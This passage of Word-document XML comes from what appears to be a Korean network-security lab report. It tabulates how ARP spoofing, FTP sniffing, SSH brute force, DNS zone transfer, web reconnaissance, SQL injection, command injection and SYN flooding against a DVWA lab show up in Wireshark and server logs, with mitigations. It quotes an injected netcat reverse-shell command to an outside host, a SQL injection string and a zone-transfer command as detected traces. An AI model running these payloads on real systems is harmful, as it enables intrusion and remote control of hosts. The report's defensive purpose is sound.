            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>dig axfr wj.com @172.16.18.28 수행 및 전송 로그 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TCP 53 제한(Secondary DNS만 허용) 정책 적용</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-02/WS-5-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹 정찰(whatweb)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>(기술스택/구성 정보 수집(Enumeration))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패킷+apache access.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark: http / 로그: whatweb 접근 기록</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>whatweb dvwa.wj.com 요청이 access.log에 기록</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>내부 전용 서비스일 경우 80/443 접근대역 제한 권고</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-03/TERM-5-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SQL Injection 시도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>(요청 인자(URL/폼) 내 SQL 예약어 포함)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패킷+apache access.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark: http.request.uri / 로그: 특정 페이지 연속 호출</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>' OR '1'='1' # 등 페이로드 흔적 및 접근 패턴 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>L3/L4 방화벽만으로 차단 한계 → WAF/애플리케이션 보완 필요</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-03/WS-5-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Command Injection &amp; Reverse Shell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>(/vulnerabilities/exec/ 반복 POST 및 nc 역접속)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패킷+apache access.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>로그: 비정상 경로 반복/페이로드 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh 시도 흔적 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>취약 기능 접근통제/패치 + 아웃바운드 제어(egress) 및 탐지 룰 연계</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-03/TERM-5-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DoS(SYN Flooding)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>(커널 경고: Possible SYN flooding)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kern.log/dmesg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TCP: Possible SYN flooding on port 80. Sending cookies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>커널 로그에서 SYN Flood 징후 메시지 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SYN cookies/율제한/상위 장비 차단 정책 적용 검토</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-7. Wireshark 필터 및 정상/비정상 판별 기준(요약)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3213"/>
        <w:gridCol w:w="3213"/>
        <w:gridCol w:w="3213"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551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필터</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386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정상/비정상 식별 기준</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ARP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>arp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>동일 IP에 대해 MAC 주소가 지속 변조되는지 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>FTP 스니핑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ftp || tcp.port == 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Payload 내 계정 정보 노출 여부 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SYN 스캔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>tcp.flags.syn == 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>단시간 내 다수 포트 접속 시도(정찰)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH Brute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>tcp.port == 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>동일 IP에서 인증 시도 횟수 폭증</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS AXFR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>tcp.port == 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Zone Transfer 트래픽 여부 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹 정찰</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>스캐너/정찰 도구의 특징적 요청(UA/경로)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>http.request.uri</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>요청 데이터에 DB 예약어/패턴 포함 여부</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-2. Wireshark - ARP Spoofing 식별(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: WS-5-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>필터(arp) 적용 화면 및 동일 IP의 MAC 변조 구간 강조</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-3. auth.log - SSH 스캔/브루트포스 로그 패턴(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>nmap/hydra 수행 구간의 인증 실패 반복 및 MaxStartups 메시지 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-4. syslog - DNS AXFR 전송 시작/종료 로그(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>AXFR started/ended 및 전송 레코드 수 확인 가능하도록 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-5. Apache access.log - whatweb/SQLi/Reverse Shell 흔적(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-03</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>DVWA 접근 경로(/login.php 등) 및 /vulnerabilities/exec/ 반복 요청 강조</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-6. kern.log/dmesg - SYN Flooding 징후(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-04</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>TCP: Possible SYN flooding 메시지 및 발생 시각 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>※ 아래는 시나리오별 상세 결과(표/증빙 삽입용)이다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-1. 시나리오 상세(S1-1 ARP Spoofing)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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-1 / ARP Spoofing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공격 기법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동일 IP에 대한 MAC 주소 지속 변조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관제 데이터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패킷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식별 기준(필터/키워드)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Wireshark 필터: arp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관측 결과(요약)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동일 IP의 ARP Reply에서 MAC 변경 반복(비정상 징후)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대응/후속 조치(요약)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스위치 보안(DAI)·정적 ARP·탐지 룰 적용 검토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공격/검증 명령(예시)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핵심 로그 경로(예시)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차단/대응(상세)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(정책/룰/운영절차 기입. 예: UFW/iptables/SSHD/WAF/ACL 등)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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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WS-5-01/PCAP-5-01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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-1. S1-1 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: WS-5-01/PCAP-5-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-2. 시나리오 상세(S1-2 FTP 패킷 스니핑)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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-2 / FTP 패킷 스니핑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공격 기법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평문 Payload 내 계정정보 노출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관제 데이터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패킷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식별 기준(필터/키워드)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Wireshark 필터: ftp || tcp.port == 21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관측 결과(요약)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Payload 구간에서 인증정보 노출 여부 확인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대응/후속 조치(요약)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FTP 사용 제한 및 SFTP/FTPS 전환 권고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공격/검증 명령(예시)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핵심 로그 경로(예시)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차단/대응(상세)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(정책/룰/운영절차 기입. 예: UFW/iptables/SSHD/WAF/ACL 등)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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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WS-5-02/PCAP-5-02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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
